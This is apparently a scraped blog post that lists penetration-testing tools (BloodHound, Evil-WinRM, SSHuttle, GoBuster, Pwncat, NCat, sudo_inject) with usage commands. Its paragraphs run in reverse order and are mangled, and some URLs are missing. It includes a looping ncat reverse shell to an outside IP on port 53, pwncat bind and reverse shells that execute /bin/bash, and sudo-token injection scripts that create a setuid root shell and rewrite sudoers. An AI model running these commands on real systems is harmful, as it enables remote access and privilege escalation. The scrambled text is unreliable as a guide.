![]() It can run locally or in a docker container. This app gives a Remote Power Shell prompt. Use the credentials changed above to connect and import the acquired output files in to BloodHound.Įvil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. Go to the page and enter neo4j as user and password, then change them on the next page. It can be installed using the official tutorial or if you are using Kali just follow the commands: sudo apt-get install bloodhound -y Then transfer the output to the machine where the BloodHound will analyze it. Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups). Use the argument -r to set the credentials to login into the host, followed by the network you want to reach over the VPN ( 192.168.0.0/16 in this example), –dns all the DNS requests will also be tunneled, and 0/0 informs that all the traffic must go through the VPN as well.īloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. Note that ICMP (ping) does not work over this VPN. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. SSHuttle – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally. On the second example, it looks for subdomains using dns -d and –wildcard detects properly the existence of a wildcard (*.). The first example uses -w to inform the wordlist file, -u to inform the URL or domain, -e for expanded mode, and -t define the number of threads. Gobuster dns -d -w subdomains.txt -wildcard Gobuster dir -e -t 50 -u -w /usr/share/wordlists/dirb/common.txt GoBuster – A tool to brute-force and discover directories, files, and subdomains. SeatBelt – Performs a number of security-oriented host-survey safety checks. The second and third are reverse and reconnect if Ctrl+C interrupts it but the third works over UDP. The first example will keep listening (blind) even after disconnect. Pwncat -e '/bin/bash' 4444 -u -ping-intvl 1 Pwncat -e '/bin/bash' 4444 -reconn -recon-wait 1 PwnCat – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat. Python3 -c ' import pty pty.spawn("/bin/bash")' While true do ncat -ssl -v 174.88.217.186 53 -e /bin/bash sleep 5 done NCat – A NetCat version by NMAP that accepts SSL. wget -qO - | sudo apt-key add -Įcho "deb apt/stable/" | sudo tee /etc/apt//sublime-text.list SublimeText – A very sophisticated text editor for code and markup. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands. GDB – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed. sudo gem install zstegĮxifTool – An application for reading and writing meta information in a wide variety of files. Zsteg – A Ruby application to detect and extract hidden data in image files. Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo: bash exploit_v3.shįoremost – A forensics tool to recover files based on headers and footers from disk or image file. Will create a sh shell in /tmp owned by root with setuid: bash exploit_v2.sh You can use it to activate the sudo token in your session: bash exploit.sh Will create the binary activate_sudo_token in /tmp. Sudo_inject – Injects process that have valid sudo token and activate our own sudo token. SuBruteForce – Full throttle to get access as a specific user. Sudo -V | grep "Sudo ver" searchsploit "sudo 1.9.5p1" Other sources of vulns/exploits at NIST Search Vulnerability Database, Mitre CVE, and CVE Program Mission. SearchSploit – Simple way to search for vulnerabilities on a local copy of the. Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-hosts task share, and more.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |